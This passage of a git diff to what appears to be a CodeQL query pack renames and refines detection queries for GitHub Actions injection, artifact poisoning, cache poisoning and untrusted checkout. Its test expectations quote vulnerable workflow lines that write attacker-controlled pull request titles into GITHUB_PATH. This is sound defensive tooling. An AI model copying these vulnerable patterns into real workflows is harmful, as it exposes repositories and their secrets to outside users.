["cat\\s+", "<"] + ".*" + ["`", "\\)"]) ) @@ -32,7 +32,7 @@ class EnvPathInjectionFromEnvVarSink extends EnvPathInjectionSink { exists(Run run, Expression expr, string varname, string value | this.asExpr().getInScopeEnvVarExpr(varname) = expr and run.getScriptScalar() = this.asExpr() and - Utils::writeToGitHubPath(run, value) and + writeToGitHubPath(run, value) and ( value.matches("%$" + ["", "{", "ENV{"] + varname + "%") or diff --git a/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll b/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll index 0467a51f4e9c..12919004c039 100644 --- a/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll +++ b/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll @@ -11,7 +11,7 @@ class EnvVarInjectionFromEnvVarSink extends EnvVarInjectionSink { EnvVarInjectionFromEnvVarSink() { exists(Run run, Expression expr, string varname, string key, string value | expr = run.getInScopeEnvVarExpr(varname) and - Utils::writeToGitHubEnv(run, key, value) and + writeToGitHubEnv(run, key, value) and run.getScriptScalar() = this.asExpr() and value.matches("%$" + ["", "{", "ENV{"] + varname + "%") ) @@ -23,7 +23,7 @@ class EnvVarInjectionFromFileReadSink extends EnvVarInjectionSink { exists(Run run, UntrustedArtifactDownloadStep step, string value | this.asExpr() = run.getScriptScalar() and step.getAFollowingStep() = run and - Utils::writeToGitHubEnv(run, _, value) and + writeToGitHubEnv(run, _, value) and // TODO: add support for other commands like `<`, `jq`, ... value.regexpMatch(["\\$\\(", "`"] + ["cat\\s+", "<"] + ".*" + ["`", "\\)"]) ) diff --git a/ql/lib/codeql/actions/security/PoisonableSteps.qll b/ql/lib/codeql/actions/security/PoisonableSteps.qll index 070dcbda5329..40dfbd3a0b09 100644 --- a/ql/lib/codeql/actions/security/PoisonableSteps.qll +++ b/ql/lib/codeql/actions/security/PoisonableSteps.qll @@ -75,7 +75,7 @@ class EnvVarInjectionRunStep extends PoisonableStep, Run { // Run step with env var definition based on file content. // eg: `echo "sha=$(cat test-results/sha-number)" >> $GITHUB_ENV` // eg: `echo "sha=$(> $GITHUB_ENV` - Utils::writeToGitHubEnv(this, _, value) and + writeToGitHubEnv(this, _, value) and // TODO: add support for other commands like `<`, `jq`, ... value.regexpMatch(["\\$\\(", "`"] + ["ls\\s+", "cat\\s+", "<"] + ".*" + ["`", "\\)"]) ) diff --git a/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll b/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll index f6598f1faaf4..aeceaa8da756 100644 --- a/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll +++ b/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll @@ -4,7 +4,7 @@ import codeql.actions.DataFlow bindingset[s] predicate containsPullRequestNumber(string s) { exists( - Utils::normalizeExpr(s) + normalizeExpr(s) .regexpFind([ "\\bgithub\\.event\\.number\\b", "\\bgithub\\.event\\.issue\\.number\\b", "\\bgithub\\.event\\.pull_request\\.id\\b", @@ -24,7 +24,7 @@ predicate containsPullRequestNumber(string s) { bindingset[s] predicate containsHeadSHA(string s) { exists( - Utils::normalizeExpr(s) + normalizeExpr(s) .regexpFind([ "\\bgithub\\.event\\.pull_request\\.head\\.sha\\b", "\\bgithub\\.event\\.pull_request\\.merge_commit_sha\\b", @@ -51,7 +51,7 @@ predicate containsHeadSHA(string s) { bindingset[s] predicate containsHeadRef(string s) { exists( - Utils::normalizeExpr(s) + normalizeExpr(s) .regexpFind([ "\\bgithub\\.event\\.pull_request\\.head\\.ref\\b", "\\bgithub\\.head_ref\\b", "\\bgithub\\.event\\.workflow_run\\.head_branch\\b", @@ -234,7 +234,7 @@ class LabelControlCheck extends ControlCheck { // eg: contains(github.event.pull_request.labels.*.name, 'safe to test') // eg: github.event.label.name == 'safe to test' exists( - Utils::normalizeExpr(this.getCondition()) + normalizeExpr(this.getCondition()) .regexpFind([ "\\bgithub\\.event\\.pull_request\\.labels\\b", "\\bgithub\\.event\\.label\\.name\\b" ], _, _) @@ -248,7 +248,7 @@ class ActorControlCheck extends ControlCheck { // eg: github.triggering_actor != 'CI Agent' // eg: github.event.pull_request.user.login == 'mybot' exists( - Utils::normalizeExpr(this.getCondition()) + normalizeExpr(this.getCondition()) .regexpFind([ "\\bgithub\\.actor\\b", "\\bgithub\\.triggering_actor\\b", "\\bgithub\\.event\\.comment\\.user\\.login\\b", @@ -262,7 +262,7 @@ class AssociationControlCheck extends ControlCheck { AssociationControlCheck() { // eg: contains(fromJson('["MEMBER", "OWNER"]'), github.event.comment.author_association) exists( - Utils::normalizeExpr(this.getCondition()) + normalizeExpr(this.getCondition()) .regexpFind([ "\\bgithub\\.event\\.comment\\.author_association\\b", "\\bgithub\\.event\\.issue\\.author_association\\b", diff --git a/ql/src/Debug/partial.ql b/ql/src/Debug/partial.ql index 702a454645c5..27cad8b98a43 100644 --- a/ql/src/Debug/partial.ql +++ b/ql/src/Debug/partial.ql @@ -16,7 +16,7 @@ import PartialFlow::PartialPathGraph private module MyConfig implements DataFlow::ConfigSig { predicate isSource(DataFlow::Node source) { source instanceof RemoteFlowSource and - source.getLocation().getFile().getBaseName() = "test.yml" + source.getLocation().getFile().getBaseName() = "non-existant-test.yml" } predicate isSink(DataFlow::Node sink) { none() } diff --git a/ql/src/Security/CWE-077/PrivilegedEnvPathInjection.ql b/ql/src/Security/CWE-077/EnvPathInjectionCritical.ql similarity index 74% rename from ql/src/Security/CWE-077/PrivilegedEnvPathInjection.ql rename to ql/src/Security/CWE-077/EnvPathInjectionCritical.ql index a25473fd812e..fc96c3d43538 100644 --- a/ql/src/Security/CWE-077/PrivilegedEnvPathInjection.ql +++ b/ql/src/Security/CWE-077/EnvPathInjectionCritical.ql @@ -4,8 +4,8 @@ * @kind path-problem * @problem.severity error * @security-severity 9 - * @precision high - * @id actions/privileged-envpath-injection + * @precision very-high + * @id actions/envpath-injection/critical * @tags actions * security * external/cwe/cwe-077 @@ -19,14 +19,17 @@ import EnvPathInjectionFlow::PathGraph from EnvPathInjectionFlow::PathNode source, EnvPathInjectionFlow::PathNode sink where EnvPathInjectionFlow::flowPath(source, sink) and - // sink belongs to a privileged job - sink.getNode().asExpr().getEnclosingJob().isPrivileged() and ( - not source.getNode().(RemoteFlowSource).getSourceType() = "artifact" + inPrivilegedCompositeAction(sink.getNode().asExpr()) or + inPrivilegedExternallyTriggerableJob(sink.getNode().asExpr()) + ) and + ( source.getNode().(RemoteFlowSource).getSourceType() = "artifact" and sink.getNode() instanceof EnvPathInjectionFromFileReadSink + or + not source.getNode().(RemoteFlowSource).getSourceType() = "artifact" ) select sink.getNode(), source, sink, - "Potential privileged PATH environment variable injection in $@, which may be controlled by an external user.", + "Potential PATH environment variable injection in $@, which may be controlled by an external user.", sink, sink.getNode().toString() diff --git a/ql/src/Security/CWE-077/EnvPathInjection.ql b/ql/src/Security/CWE-077/EnvPathInjectionMedium.ql similarity index 78% rename from ql/src/Security/CWE-077/EnvPathInjection.ql rename to ql/src/Security/CWE-077/EnvPathInjectionMedium.ql index 80d1729b2670..cc067598c893 100644 --- a/ql/src/Security/CWE-077/EnvPathInjection.ql +++ b/ql/src/Security/CWE-077/EnvPathInjectionMedium.ql @@ -5,7 +5,7 @@ * @problem.severity warning * @security-severity 5.0 * @precision high - * @id actions/envpath-injection + * @id actions/envpath-injection/medium * @tags actions * security * external/cwe/cwe-077 @@ -20,14 +20,9 @@ from EnvPathInjectionFlow::PathNode source, EnvPathInjectionFlow::PathNode sink where EnvPathInjectionFlow::flowPath(source, sink) and ( - // sink belongs to a composite action - exists(sink.getNode().asExpr().getEnclosingCompositeAction()) + inNonPrivilegedCompositeAction(sink.getNode().asExpr()) or - // sink belongs to a non-privileged job - exists(Job j | - j = sink.getNode().asExpr().getEnclosingJob() and - not j.isPrivileged() - ) and + inNonPrivilegedJob(sink.getNode().asExpr()) and ( not source.getNode().(RemoteFlowSource).getSourceType() = "artifact" or diff --git a/ql/src/Security/CWE-077/PrivilegedEnvVarInjection.ql b/ql/src/Security/CWE-077/EnvVarInjectionCritical.ql similarity index 77% rename from ql/src/Security/CWE-077/PrivilegedEnvVarInjection.ql rename to ql/src/Security/CWE-077/EnvVarInjectionCritical.ql index 5311d9a4de85..4b0799ca4410 100644 --- a/ql/src/Security/CWE-077/PrivilegedEnvVarInjection.ql +++ b/ql/src/Security/CWE-077/EnvVarInjectionCritical.ql @@ -4,8 +4,8 @@ * @kind path-problem * @problem.severity error * @security-severity 9 - * @precision high - * @id actions/privileged-envvar-injection + * @precision very-high + * @id actions/envvar-injection/critical * @tags actions * security * external/cwe/cwe-077 @@ -28,10 +28,13 @@ predicate artifactToFileRead(DataFlow::Node source, DataFlow::Node sink) { from EnvVarInjectionFlow::PathNode source, EnvVarInjectionFlow::PathNode sink where EnvVarInjectionFlow::flowPath(source, sink) and - // sink belongs to a privileged job - sink.getNode().asExpr().getEnclosingJob().isPrivileged() and + ( + inPrivilegedCompositeAction(sink.getNode().asExpr()) + or + inPrivilegedExternallyTriggerableJob(sink.getNode().asExpr()) + ) and // exclude paths to file read sinks from non-artifact sources artifactToFileRead(source.getNode(), sink.getNode()) select sink.getNode(), source, sink, - "Potential privileged environment variable injection in $@, which may be controlled by an external user.", + "Potential environment variable injection in $@, which may be controlled by an external user.", sink, sink.getNode().toString() diff --git a/ql/src/Security/CWE-077/EnvVarInjection.ql b/ql/src/Security/CWE-077/EnvVarInjectionMedium.ql similarity index 80% rename from ql/src/Security/CWE-077/EnvVarInjection.ql rename to ql/src/Security/CWE-077/EnvVarInjectionMedium.ql index 8c2510954577..7eb239e83a06 100644 --- a/ql/src/Security/CWE-077/EnvVarInjection.ql +++ b/ql/src/Security/CWE-077/EnvVarInjectionMedium.ql @@ -5,7 +5,7 @@ * @problem.severity warning * @security-severity 5.0 * @precision high - * @id actions/envvar-injection + * @id actions/envvar-injection/medium * @tags actions * security * external/cwe/cwe-077 @@ -29,14 +29,9 @@ from EnvVarInjectionFlow::PathNode source, EnvVarInjectionFlow::PathNode sink where EnvVarInjectionFlow::flowPath(source, sink) and ( - // sink belongs to a composite action - exists(sink.getNode().asExpr().getEnclosingCompositeAction()) + inNonPrivilegedCompositeAction(sink.getNode().asExpr()) or - // sink belongs to a non-privileged job - exists(Job j | - j = sink.getNode().asExpr().getEnclosingJob() and - not j.isPrivileged() - ) and + inNonPrivilegedJob(sink.getNode().asExpr()) and // exclude paths to file read sinks from non-artifact sources artifactToFileRead(source.getNode(), sink.getNode()) ) diff --git a/ql/src/Security/CWE-078/PrivilegedCommandInjection.ql b/ql/src/Security/CWE-078/CommandInjectionCritical.ql similarity index 59% rename from ql/src/Security/CWE-078/PrivilegedCommandInjection.ql rename to ql/src/Security/CWE-078/CommandInjectionCritical.ql index adb8f25f077a..2c2ab2f2af5b 100644 --- a/ql/src/Security/CWE-078/PrivilegedCommandInjection.ql +++ b/ql/src/Security/CWE-078/CommandInjectionCritical.ql @@ -1,12 +1,12 @@ /** - * @name Command built from user-controlled sources on a privileged context + * @name Command built from user-controlled sources * @description Building a system command from user-controlled sources is vulnerable to insertion of * malicious code by the user. * @kind path-problem * @problem.severity error * @security-severity 9 - * @precision high - * @id actions/privileged-command-injection + * @precision very-high + * @id actions/command-injection/critical * @tags actions * security * external/cwe/cwe-078 @@ -19,10 +19,11 @@ import CommandInjectionFlow::PathGraph from CommandInjectionFlow::PathNode source, CommandInjectionFlow::PathNode sink where CommandInjectionFlow::flowPath(source, sink) and - exists(Job j | - j = sink.getNode().asExpr().getEnclosingJob() and - j.isPrivileged() + ( + inPrivilegedCompositeAction(sink.getNode().asExpr()) + or + inPrivilegedExternallyTriggerableJob(sink.getNode().asExpr()) ) select sink.getNode(), source, sink, - "Potential privileged command injection in $@, which may be controlled by an external user.", - sink, sink.getNode().asExpr().(Expression).getRawExpression() + "Potential command injection in $@, which may be controlled by an external user.", sink, + sink.getNode().asExpr().(Expression).getRawExpression() diff --git a/ql/src/Security/CWE-078/CommandInjection.ql b/ql/src/Security/CWE-078/CommandInjectionMedium.ql similarity index 79% rename from ql/src/Security/CWE-078/CommandInjection.ql rename to ql/src/Security/CWE-078/CommandInjectionMedium.ql index 6ac15f83207a..072ebbc8dced 100644 --- a/ql/src/Security/CWE-078/CommandInjection.ql +++ b/ql/src/Security/CWE-078/CommandInjectionMedium.ql @@ -6,7 +6,7 @@ * @problem.severity warning * @security-severity 5.0 * @precision high - * @id actions/command-injection + * @id actions/command-injection/medium * @tags actions * security * external/cwe/cwe-078 @@ -20,12 +20,8 @@ from CommandInjectionFlow::PathNode source, CommandInjectionFlow::PathNode sink where CommandInjectionFlow::flowPath(source, sink) and ( - exists(sink.getNode().asExpr().getEnclosingCompositeAction()) - or - exists(Job j | - j = sink.getNode().asExpr().getEnclosingJob() and - not j.isPrivileged() - ) + inNonPrivilegedCompositeAction(sink.getNode().asExpr()) or + inNonPrivilegedJob(sink.getNode().asExpr()) ) select sink.getNode(), source, sink, "Potential command injection in $@, which may be controlled by an external user.", sink, diff --git a/ql/src/Security/CWE-094/PrivilegedCodeInjection.ql b/ql/src/Security/CWE-094/CodeInjectionCritical.ql similarity index 68% rename from ql/src/Security/CWE-094/PrivilegedCodeInjection.ql rename to ql/src/Security/CWE-094/CodeInjectionCritical.ql index d043bd930b6a..7e14825a2952 100644 --- a/ql/src/Security/CWE-094/PrivilegedCodeInjection.ql +++ b/ql/src/Security/CWE-094/CodeInjectionCritical.ql @@ -1,12 +1,12 @@ /** - * @name Code injection on a privileged context + * @name Code injection * @description Interpreting unsanitized user input as code allows a malicious user to perform arbitrary * code execution. * @kind path-problem * @problem.severity error * @security-severity 9 - * @precision high - * @id actions/privileged-code-injection + * @precision very-high + * @id actions/code-injection/critical * @tags actions * security * external/cwe/cwe-094 @@ -21,10 +21,11 @@ import CodeInjectionFlow::PathGraph from CodeInjectionFlow::PathNode source, CodeInjectionFlow::PathNode sink where CodeInjectionFlow::flowPath(source, sink) and - exists(Job j | - j = sink.getNode().asExpr().getEnclosingJob() and - j.isPrivileged() + ( + inPrivilegedCompositeAction(sink.getNode().asExpr()) + or + inPrivilegedExternallyTriggerableJob(sink.getNode().asExpr()) ) select sink.getNode(), source, sink, - "Potential privileged code injection in $@, which may be controlled by an external user.", sink, + "Potential code injection in $@, which may be controlled by an external user.", sink, sink.getNode().asExpr().(Expression).getRawExpression() diff --git a/ql/src/Security/CWE-094/CodeInjection.ql b/ql/src/Security/CWE-094/CodeInjectionMedium.ql similarity index 77% rename from ql/src/Security/CWE-094/CodeInjection.ql rename to ql/src/Security/CWE-094/CodeInjectionMedium.ql index aa5bbfdf75a6..7599ef8847ba 100644 --- a/ql/src/Security/CWE-094/CodeInjection.ql +++ b/ql/src/Security/CWE-094/CodeInjectionMedium.ql @@ -5,8 +5,8 @@ * @kind path-problem * @problem.severity warning * @security-severity 5.0 - * @precision high - * @id actions/code-injection + * @precision medium + * @id actions/code-injection/medium * @tags actions * security * external/cwe/cwe-094 @@ -22,12 +22,8 @@ from CodeInjectionFlow::PathNode source, CodeInjectionFlow::PathNode sink where CodeInjectionFlow::flowPath(source, sink) and ( - exists(sink.getNode().asExpr().getEnclosingCompositeAction()) - or - exists(Job j | - j = sink.getNode().asExpr().getEnclosingJob() and - not j.isPrivileged() - ) + inNonPrivilegedCompositeAction(sink.getNode().asExpr()) or + inNonPrivilegedJob(sink.getNode().asExpr()) ) select sink.getNode(), source, sink, "Potential code injection in $@, which may be controlled by an external user.", sink, diff --git a/ql/src/Security/CWE-349/CachePoisoning.ql b/ql/src/Security/CWE-349/CachePoisoning.ql index 0250d9aada1d..80ebd92c5d31 100644 --- a/ql/src/Security/CWE-349/CachePoisoning.ql +++ b/ql/src/Security/CWE-349/CachePoisoning.ql @@ -18,22 +18,24 @@ import codeql.actions.security.PoisonableSteps from LocalJob j, PRHeadCheckoutStep checkout, Step s where - // The workflow runs in the context of the default branch + // the workflow runs in the context of the default branch runsOnDefaultBranch(j) and - // The job checkouts untrusted code from a pull request + // the job checkouts untrusted code from a pull request // TODO: Consider adding artifact downloads as a potential source of cache poisoning j.getAStep() = checkout and + // job can be triggered by an external user + j.isExternallyTriggerable() and ( - // The job writes to the cache + // the job writes to the cache // (No need to follow the checkout step as the cache writing is normally done after the job completes) j.getAStep() = s and s instanceof CacheWritingStep or - // The job executes checked-out code + // the job executes checked-out code // (The cache specific token can be leaked even for non-privileged workflows) checkout.getAFollowingStep() = s and s instanceof PoisonableStep and - // Excluding privileged workflows since they can be easily exploited in similar circumstances + // excluding privileged workflows since they can be easily exploited in similar circumstances not j.isPrivileged() ) select checkout, "Potential cache poisoning in the context of the default branch on step $@.", s, diff --git a/ql/src/Security/CWE-349/CachePoisoningByCodeInjection.ql b/ql/src/Security/CWE-349/CachePoisoningByCodeInjection.ql index 5d739d746d50..1c13497ddaf2 100644 --- a/ql/src/Security/CWE-349/CachePoisoningByCodeInjection.ql +++ b/ql/src/Security/CWE-349/CachePoisoningByCodeInjection.ql @@ -21,7 +21,9 @@ from CodeInjectionFlow::PathNode source, CodeInjectionFlow::PathNode sink, Local where CodeInjectionFlow::flowPath(source, sink) and j = sink.getNode().asExpr().getEnclosingJob() and - // Excluding privileged workflows since they can be easily exploited in similar circumstances + // job can be triggered by an external user + j.isExternallyTriggerable() and + // excluding privileged workflows since they can be easily exploited in similar circumstances not j.isPrivileged() and // The workflow runs in the context of the default branch runsOnDefaultBranch(j) diff --git a/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.ql b/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.ql index 6b3e0628f40b..2144db7afa0c 100644 --- a/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.ql +++ b/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.ql @@ -17,6 +17,8 @@ import codeql.actions.security.PoisonableSteps from ControlCheck check, MutableRefCheckoutStep checkout where + // the job can be triggered by an external user + check.getEnclosingJob().isExternallyTriggerable() and // the mutable checkout step is protected by an access check check = [checkout.getIf(), checkout.getEnclosingJob().getIf()] and // the checked-out code may lead to arbitrary code execution @@ -25,7 +27,7 @@ where // label gates do not depend on the triggering event check instanceof LabelControlCheck or - // actor or Association gates apply to IssueOps only + // actor or association gates apply to IssueOps only (check instanceof AssociationControlCheck or check instanceof ActorControlCheck) and check.getEnclosingJob().getATriggerEvent().getName().matches("%_comment") ) diff --git a/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.ql b/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.ql index fcf832699603..11dfa7fc5670 100644 --- a/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.ql +++ b/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.ql @@ -17,6 +17,8 @@ import codeql.actions.security.PoisonableSteps from ControlCheck check, MutableRefCheckoutStep checkout where + // the job can be triggered by an external user + check.getEnclosingJob().isExternallyTriggerable() and // the mutable checkout step is protected by an access check check = [checkout.getIf(), checkout.getEnclosingJob().getIf()] and // there are no evidences that the checked-out code can lead to arbitrary code execution diff --git a/ql/src/Security/CWE-829/PrivilegedArtifactPoisoning.ql b/ql/src/Security/CWE-829/ArtifactPoisoningCritical.ql similarity index 64% rename from ql/src/Security/CWE-829/PrivilegedArtifactPoisoning.ql rename to ql/src/Security/CWE-829/ArtifactPoisoningCritical.ql index 379babf35f82..a7d2518564de 100644 --- a/ql/src/Security/CWE-829/PrivilegedArtifactPoisoning.ql +++ b/ql/src/Security/CWE-829/ArtifactPoisoningCritical.ql @@ -3,9 +3,9 @@ * @description An attacker may be able to poison the workflow's artifacts and influence on consequent steps. * @kind path-problem * @problem.severity error - * @precision high + * @precision very-high * @security-severity 9 - * @id actions/privileged-artifact-poisoning + * @id actions/artifact-poisoning/critical * @tags actions * security * external/cwe/cwe-829 @@ -18,10 +18,11 @@ import ArtifactPoisoningFlow::PathGraph from ArtifactPoisoningFlow::PathNode source, ArtifactPoisoningFlow::PathNode sink where ArtifactPoisoningFlow::flowPath(source, sink) and - exists(Job j | - j = sink.getNode().asExpr().getEnclosingJob() and - j.isPrivileged() + ( + inPrivilegedCompositeAction(sink.getNode().asExpr()) + or + inPrivilegedExternallyTriggerableJob(sink.getNode().asExpr()) ) select sink.getNode(), source, sink, - "Potential privileged artifact poisoning in $@, which may be controlled by an external user.", - sink, sink.getNode().toString() + "Potential artifact poisoning in $@, which may be controlled by an external user.", sink, + sink.getNode().toString() diff --git a/ql/src/Security/CWE-829/ArtifactPoisoning.ql b/ql/src/Security/CWE-829/ArtifactPoisoningMedium.ql similarity index 77% rename from ql/src/Security/CWE-829/ArtifactPoisoning.ql rename to ql/src/Security/CWE-829/ArtifactPoisoningMedium.ql index c26862960d15..a4fb958b7f96 100644 --- a/ql/src/Security/CWE-829/ArtifactPoisoning.ql +++ b/ql/src/Security/CWE-829/ArtifactPoisoningMedium.ql @@ -5,7 +5,7 @@ * @problem.severity warning * @precision high * @security-severity 5.0 - * @id actions/artifact-poisoning + * @id actions/artifact-poisoning/medium * @tags actions * security * external/cwe/cwe-829 @@ -19,12 +19,8 @@ from ArtifactPoisoningFlow::PathNode source, ArtifactPoisoningFlow::PathNode sin where ArtifactPoisoningFlow::flowPath(source, sink) and ( - exists(sink.getNode().asExpr().getEnclosingCompositeAction()) - or - exists(Job j | - j = sink.getNode().asExpr().getEnclosingJob() and - not j.isPrivileged() - ) + inNonPrivilegedCompositeAction(sink.getNode().asExpr()) or + inNonPrivilegedJob(sink.getNode().asExpr()) ) select sink.getNode(), source, sink, "Potential artifact poisoning in $@, which may be controlled by an external user.", sink, diff --git a/ql/src/Security/CWE-829/PrivilegedUntrustedCheckoutCritical.ql b/ql/src/Security/CWE-829/UntrustedCheckoutCritical.ql similarity index 85% rename from ql/src/Security/CWE-829/PrivilegedUntrustedCheckoutCritical.ql rename to ql/src/Security/CWE-829/UntrustedCheckoutCritical.ql index 1181cd1e7559..0a597ee3fa48 100644 --- a/ql/src/Security/CWE-829/PrivilegedUntrustedCheckoutCritical.ql +++ b/ql/src/Security/CWE-829/UntrustedCheckoutCritical.ql @@ -5,9 +5,9 @@ * that is able to push to the base repository and to access secrets. * @kind problem * @problem.severity error - * @precision high + * @precision very-high * @security-severity 9.3 - * @id actions/privileged-untrusted-checkout/critical + * @id actions/untrusted-checkout/critical * @tags actions * security * external/cwe/cwe-829 @@ -20,10 +20,14 @@ import codeql.actions.security.PoisonableSteps from LocalJob j, PRHeadCheckoutStep checkout where j = checkout.getEnclosingJob() and - j.isPrivileged() and j.getAStep() = checkout and checkout.getAFollowingStep() instanceof PoisonableStep and not exists(ControlCheck check | checkout.getIf() = check or checkout.getEnclosingJob().getIf() = check + ) and + ( + inPrivilegedCompositeAction(checkout) + or + inPrivilegedExternallyTriggerableJob(checkout) ) select checkout, "Potential unsafe checkout of untrusted pull request on privileged workflow." diff --git a/ql/src/Security/CWE-829/PrivilegedUntrustedCheckoutHigh.ql b/ql/src/Security/CWE-829/UntrustedCheckoutHigh.ql similarity index 87% rename from ql/src/Security/CWE-829/PrivilegedUntrustedCheckoutHigh.ql rename to ql/src/Security/CWE-829/UntrustedCheckoutHigh.ql index bf2cf129fbf5..29a15accdf27 100644 --- a/ql/src/Security/CWE-829/PrivilegedUntrustedCheckoutHigh.ql +++ b/ql/src/Security/CWE-829/UntrustedCheckoutHigh.ql @@ -7,7 +7,7 @@ * @problem.severity warning * @precision medium * @security-severity 5.3 - * @id actions/privileged-untrusted-checkout/high + * @id actions/untrusted-checkout/high * @tags actions * security * external/cwe/cwe-829 @@ -20,10 +20,14 @@ import codeql.actions.security.PoisonableSteps from LocalJob j, PRHeadCheckoutStep checkout where j = checkout.getEnclosingJob() and - j.isPrivileged() and j.getAStep() = checkout and not checkout.getAFollowingStep() instanceof PoisonableStep and not exists(ControlCheck check | checkout.getIf() = check or checkout.getEnclosingJob().getIf() = check + ) and + ( + inPrivilegedCompositeAction(checkout) + or + inPrivilegedExternallyTriggerableJob(checkout) ) select checkout, "Potential unsafe checkout of untrusted pull request on privileged workflow." diff --git a/ql/src/Security/CWE-829/UntrustedCheckoutMedium.ql b/ql/src/Security/CWE-829/UntrustedCheckoutMedium.ql new file mode 100644 index 000000000000..aa62a88935b2 --- /dev/null +++ b/ql/src/Security/CWE-829/UntrustedCheckoutMedium.ql @@ -0,0 +1,31 @@ +/** + * @name Checkout of untrusted code in trusted context + * @description Priveleged workflows have read/write access to the base repository and access to secrets. + * By explicitly checking out and running the build script from a fork the untrusted code is running in an environment + * that is able to push to the base repository and to access secrets. + * @kind problem + * @problem.severity warning + * @precision medium + * @security-severity 5.0 + * @id actions/untrusted-checkout/medium + * @tags actions + * security + * external/cwe/cwe-829 + */ + +import actions +import codeql.actions.security.UntrustedCheckoutQuery +import codeql.actions.security.PoisonableSteps + +from LocalJob j, PRHeadCheckoutStep checkout +where + j = checkout.getEnclosingJob() and + j.getAStep() = checkout and + not exists(ControlCheck check | + checkout.getIf() = check or checkout.getEnclosingJob().getIf() = check + ) and + ( + inNonPrivilegedCompositeAction(checkout) or + inNonPrivilegedJob(checkout) + ) +select checkout, "Potential unsafe checkout of untrusted pull request on privileged workflow." diff --git a/ql/test/library-tests/test.ql b/ql/test/library-tests/test.ql index 5f4218cacfe2..bedd03e2239e 100644 --- a/ql/test/library-tests/test.ql +++ b/ql/test/library-tests/test.ql @@ -1,5 +1,5 @@ import codeql.actions.Ast -import codeql.actions.Ast::Utils as Utils +import codeql.actions.Helper import codeql.actions.Cfg as Cfg import codeql.actions.DataFlow import codeql.Locations @@ -69,7 +69,7 @@ query string testNormalizeExpr(string s) { "github.event.pull_request.user['login']", "github.event.pull_request.user[\"login\"]", "github.event.pull_request['user']['login']", "foo['bar'] == baz" ] and - result = Utils::normalizeExpr(s) + result = normalizeExpr(s) } query predicate writeToGitHubEnv(string key, string value) { @@ -82,7 +82,7 @@ query predicate writeToGitHubEnv(string key, string value) { "echo 'sha2=$(> $GITHUB_ENV", "echo sha3=$(> $GITHUB_ENV", ] and - Utils::extractLineAssignment(t, "ENV", key, value) + extractLineAssignment(t, "ENV", key, value) ) } @@ -100,6 +100,6 @@ query predicate writeToGitHubOutput(string key, string value) { "echo sha5=$(> ${GITHUB_OUTPUT}", "echo sha6=$(> \"${GITHUB_OUTPUT}\"", ] and - Utils::extractLineAssignment(t, "OUTPUT", key, value) + extractLineAssignment(t, "OUTPUT", key, value) ) } diff --git a/ql/test/query-tests/Security/CWE-077/EnvPathInjection.qlref b/ql/test/query-tests/Security/CWE-077/EnvPathInjection.qlref deleted file mode 100644 index ab36454942e0..000000000000 --- a/ql/test/query-tests/Security/CWE-077/EnvPathInjection.qlref +++ /dev/null @@ -1 +0,0 @@ -Security/CWE-077/EnvPathInjection.ql diff --git a/ql/test/query-tests/Security/CWE-077/PrivilegedEnvPathInjection.expected b/ql/test/query-tests/Security/CWE-077/EnvPathInjectionCritical.expected similarity index 71% rename from ql/test/query-tests/Security/CWE-077/PrivilegedEnvPathInjection.expected rename to ql/test/query-tests/Security/CWE-077/EnvPathInjectionCritical.expected index af4b70d3a601..c6091f1fc239 100644 --- a/ql/test/query-tests/Security/CWE-077/PrivilegedEnvPathInjection.expected +++ b/ql/test/query-tests/Security/CWE-077/EnvPathInjectionCritical.expected @@ -18,8 +18,8 @@ nodes | .github/workflows/path1.yml:29:14:29:40 | echo "::add-path::$PATHINJ" | semmle.label | echo "::add-path::$PATHINJ" | subpaths #select -| .github/workflows/path1.yml:14:14:14:52 | echo $(echo "$PATHINJ") >> $GITHUB_PATH | .github/workflows/path1.yml:13:21:13:58 | github.event.pull_request.title | .github/workflows/path1.yml:14:14:14:52 | echo $(echo "$PATHINJ") >> $GITHUB_PATH | Potential privileged PATH environment variable injection in $@, which may be controlled by an external user. | .github/workflows/path1.yml:14:14:14:52 | echo $(echo "$PATHINJ") >> $GITHUB_PATH | echo $(echo "$PATHINJ") >> $GITHUB_PATH | -| .github/workflows/path1.yml:17:14:17:42 | echo $PATHINJ >> $GITHUB_PATH | .github/workflows/path1.yml:16:21:16:58 | github.event.pull_request.title | .github/workflows/path1.yml:17:14:17:42 | echo $PATHINJ >> $GITHUB_PATH | Potential privileged PATH environment variable injection in $@, which may be controlled by an external user. | .github/workflows/path1.yml:17:14:17:42 | echo $PATHINJ >> $GITHUB_PATH | echo $PATHINJ >> $GITHUB_PATH | -| .github/workflows/path1.yml:20:14:20:44 | echo ${PATHINJ} >> $GITHUB_PATH | .github/workflows/path1.yml:19:21:19:58 | github.event.pull_request.title | .github/workflows/path1.yml:20:14:20:44 | echo ${PATHINJ} >> $GITHUB_PATH | Potential privileged PATH environment variable injection in $@, which may be controlled by an external user. | .github/workflows/path1.yml:20:14:20:44 | echo ${PATHINJ} >> $GITHUB_PATH | echo ${PATHINJ} >> $GITHUB_PATH | -| .github/workflows/path1.yml:25:14:25:50 | echo "$(cat foo/bar)" >> $GITHUB_PATH | .github/workflows/path1.yml:21:9:25:6 | Uses Step | .github/workflows/path1.yml:25:14:25:50 | echo "$(cat foo/bar)" >> $GITHUB_PATH | Potential privileged PATH environment variable injection in $@, which may be controlled by an external user. | .github/workflows/path1.yml:25:14:25:50 | echo "$(cat foo/bar)" >> $GITHUB_PATH | echo "$(cat foo/bar)" >> $GITHUB_PATH | -| .github/workflows/path1.yml:29:14:29:40 | echo "::add-path::$PATHINJ" | .github/workflows/path1.yml:28:21:28:58 | github.event.pull_request.title | .github/workflows/path1.yml:29:14:29:40 | echo "::add-path::$PATHINJ" | Potential privileged PATH environment variable injection in $@, which may be controlled by an external user. | .github/workflows/path1.yml:29:14:29:40 | echo "::add-path::$PATHINJ" | echo 